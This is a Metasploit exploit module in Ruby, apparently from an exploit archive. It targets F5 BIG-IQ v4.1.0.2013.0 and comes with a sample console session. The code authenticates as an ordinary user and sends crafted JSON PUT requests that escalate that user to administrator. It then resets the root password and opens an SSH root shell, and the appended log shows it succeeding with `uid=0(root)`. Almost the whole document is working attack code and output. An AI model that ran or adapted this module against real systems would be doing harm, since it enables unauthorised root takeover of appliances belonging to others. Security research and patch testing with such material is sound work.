1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 |
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'json' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "F5 BIG-IQ v4.1.0.2013.0 authenticated arbitrary user password change", 'Description'=> %q{ F5 BIG-IQ v4.1.0.2013.0 is vulnerable to a privilege escalation attack which allows an attacker to change the root users password. This module does just this, then SSH's in. }, 'License'=> MSF_LICENSE, 'Author' => [ 'Brandon Perry <bperry.volatile@gmail.com>' ], 'References' => [ ['URL', 'http://volatile-minds.blogspot.com/2014/05/f5-big-iq-v41020130-authenticated.html'] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Targets'=> [ ['BIG-IQ 4.1.0.2013.0', {}] ], 'Privileged' => true, 'DefaultOptions'=> { 'SSL' => true, 'ExitFunction' => "none" }, 'Payload'=> { 'Compat' => { 'PayloadType'=> 'cmd_interact', 'ConnectionType' => 'find' } }, 'DisclosureDate' => "Sep 23 2013", 'DefaultTarget'=> 0)) register_options( [ Opt::RPORT(443), OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']), OptString.new('USERNAME', [true, 'The user to authenticate as.', 'username']), OptString.new('PASSWORD', [true, 'The password to authenticate with.', 'password']), OptString.new('ADMINISTRATOR', [true, 'The administrator to spoof for privilege escalation', 'root']), OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ], self.class) end def exploit post = { 'username' => datastore['USERNAME'], 'passwd' => datastore['PASSWORD'] } print_status("Authenticating as " + datastore['USERNAME']) #Simple post to get us a cookie so we can change our password res = send_request_cgi({ 'method' => 'POST', 'uri' => '/ui/actions/logmein.html', 'vars_post' => post }) if res.headers["Location"] != "/" fail_with("Authentication failed") end cookie = res.get_cookies #this gets turned into JSON # #generation will be set in try_generation if it isn't correct # #This is also the attempt at privilege escalation, so we preserve the password post = { "name" => datastore['ADMINISTRATOR'], "displayName" => "fdsa", "generation" => 1, "lastUpdateMicros" => 1395360806678747, "kind" => "shared:authz:users:usersworkerstate", "selfLink" => "https://localhost/mgmt/shared/authz/users/" + datastore['USERNAME'], "password" => datastore['PASSWORD'], "password2" => datastore['PASSWORD'], "state" => "ACTIVE" } print_status("Escalating privileges to that of " + datastore["ADMINISTRATOR"]) try_generation(post, cookie, '/mgmt/shared/authz/users/' + datastore['USERNAME']) password = Rex::Text.rand_text_alpha(rand(32)+5) #this is when we change the password for the root user post = { "name" => "root", "displayName" => "root", "generation" => 1, "lastUpdateMicros" => 1395359570236413, "kind" => "shared:authz:users:usersworkerstate", "selfLink" => "https://localhost/mgmt/shared/authz/users/root", "password" => password, "password2" => password, "state" => "ACTIVE" } select(nil,nil,nil,5) print_status("Changing root user password to " + password) try_generation(post, cookie, '/mgmt/shared/authz/users/root') res = do_login('root', password) if res print_good("Login Successful with 'root:#{password}'") handler(res.lsock) end end def try_generation(put, cookie, uri) done = false while !done res = send_request_cgi({ 'method' => "PUT", 'uri' => uri, 'data' => put.to_json, 'cookie' => cookie }) if res and res.body =~ /Invalid generation/ put['generation'] = /Need (\d{1,9}), received \d{1,9}/.match(res.body)[1] elsif res and res.body =~ /encryptedPassword/ done = true else fail_with("Didn't get a response that I expected") end end end def do_login(user, pass) opts = { :auth_methods => ['password', 'keyboard-interactive'], :msframework=> framework, :msfmodule=> self, :port => 22, :disable_agent => true, :config => true, :password => pass, :record_auth_info => true, :proxies => datastore['Proxies'] } opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] begin ssh = nil ssh = Net::SSH.start(datastore['RHOST'], user, opts) rescue Rex::ConnectionError, Rex::AddressInUse return nil rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" return nil rescue ::Timeout::Error print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" return nil rescue Net::SSH::AuthenticationFailed print_error "#{rhost}:#{rport} SSH - Failed authentication" return nil rescue Net::SSH::Exception => e print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" return nil end if ssh conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true) return conn end return nil end end __END__ msf exploit(f5_bigiq_passwd_update) > show options Module options (exploit/linux/http/f5_bigiq_passwd_update): Name Current SettingRequiredDescription ---- ---------------------------------- ADMINISTRATORroot yes The administrator to spoof for privilege escalation PASSWORD notpasswordyes The password to authenticate with. Proxies noUse a proxy chain RHOST192.168.1.8yes The target address RPORT443yes The target port SSH_TIMEOUT30 noSpecify the maximum time to negotiate a SSH session TARGETURI/yes The URI of the vulnerable instance USERNAME username yes The user to authenticate as. VHOST noHTTP server virtual host Payload options (cmd/unix/interact): NameCurrent SettingRequiredDescription -------------------------------------- Exploit target: IdName ------ 0 a msf exploit(f5_bigiq_passwd_update) > exploit [+] Login Successful with 'root:qBvBY' [*] Found shell. [*] Command shell session 3 opened (192.168.1.31:58165 -> 192.168.1.8:22) at 2014-03-20 21:18:09 -0500 id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh |